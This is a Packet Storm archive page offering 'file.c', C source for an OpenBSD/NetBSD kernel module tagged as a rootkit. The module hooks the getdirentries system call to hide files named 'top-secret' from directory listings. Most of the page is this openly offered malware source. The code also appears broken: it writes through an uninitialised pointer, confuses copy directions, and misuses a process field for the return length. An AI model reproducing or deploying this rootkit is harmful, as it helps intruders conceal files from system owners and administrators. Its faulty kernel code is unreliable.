exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

file.c

file.c
Posted Jan 5, 2003
Authored by George Dissios | Site frapes.org

OpenBSD and NetBSD LKM which hides files by patching getdirentries().

tags | tool, rootkit
systems | netbsd, unix, openbsd
SHA-256 | 281adc79edc85e83c7b2c663fcc68dfbea7fdb717f4948665d758518e709e6bf

file.c

Change Mirror Download
/* OpenBSD (should work also on NetBSD) LKM hiding file using getdirentries */
/* systemcall! */
/* 2002 by gr33k gr33k@frapes.org www.frapes.org www.gm.fh-koeln.de/~ai604 */

#define DONT_PERMIT
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/mount.h>
#include <sys/conf.h>
#include <sys/syscallargs.h>
#include <sys/exec.h>
#include <sys/lkm.h>
#include <sys/file.h>
#include <sys/filedesc.h>
#include <sys/errno.h>
#include <sys/dirent.h>
#include <sys/proc.h>
#include <sys/syslog.h>
#include <sys/malloc.h>

int my_getdirentries __P((struct proc *, void *, register_t *));
MOD_MISC("HideFile");

static int
HideFile_load(struct lkm_table *lkmtp,int cmd)
{
if(cmd==LKM_E_LOAD)
{
sysent[SYS_getdirentries].sy_call=my_getdirentries;
}
return 0;
}

static int
HideFile_unload(struct lkm_table *lkmtp,int cmd)
{
if(cmd==LKM_E_UNLOAD)
{
sysent[SYS_getdirentries].sy_call=sys_getdirentries;
}
return 0;
}

HideFile(lkmtp,cmd,ver)
struct lkm_table *lkmtp;
int cmd;
int ver;
{
DISPATCH(lkmtp,cmd,ver,HideFile_load,HideFile_unload,lkm_nofunc);
}

int
my_getdirentries(p,v,retval)
struct proc *p;
void *v;
register_t *retval;
{
register struct sys_getdirentries_args *uap=v;
unsigned int tmp,n,t;
struct dirent *dirp2,*dirp3;
char hide[]="top-secret"; /* Edit filename */

getdirentries(p,uap);
tmp=p->p_dupfd;
if(tmp>0)
{
copyin(&(uap->buf),dirp2,tmp);
dirp3=dirp2;
t=tmp;
while(t>0)
{
n=dirp3->d_reclen;
t-=n;
if(strcmp((char*)&(dirp3->d_name), (char*)&hide)==0)
{
if(t!=0)
bcopy((char*)dirp3+n,(char*)dirp3,t);
}
tmp-=n;
}
if(dirp3->d_reclen==0)
t=0;
if(t!=0)
dirp3=(struct dirent*)((char*)dirp3+dirp3->d_reclen);
}
p->p_dupfd=tmp;
copyout(dirp2,&(uap->buf),tmp);
return (0);
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close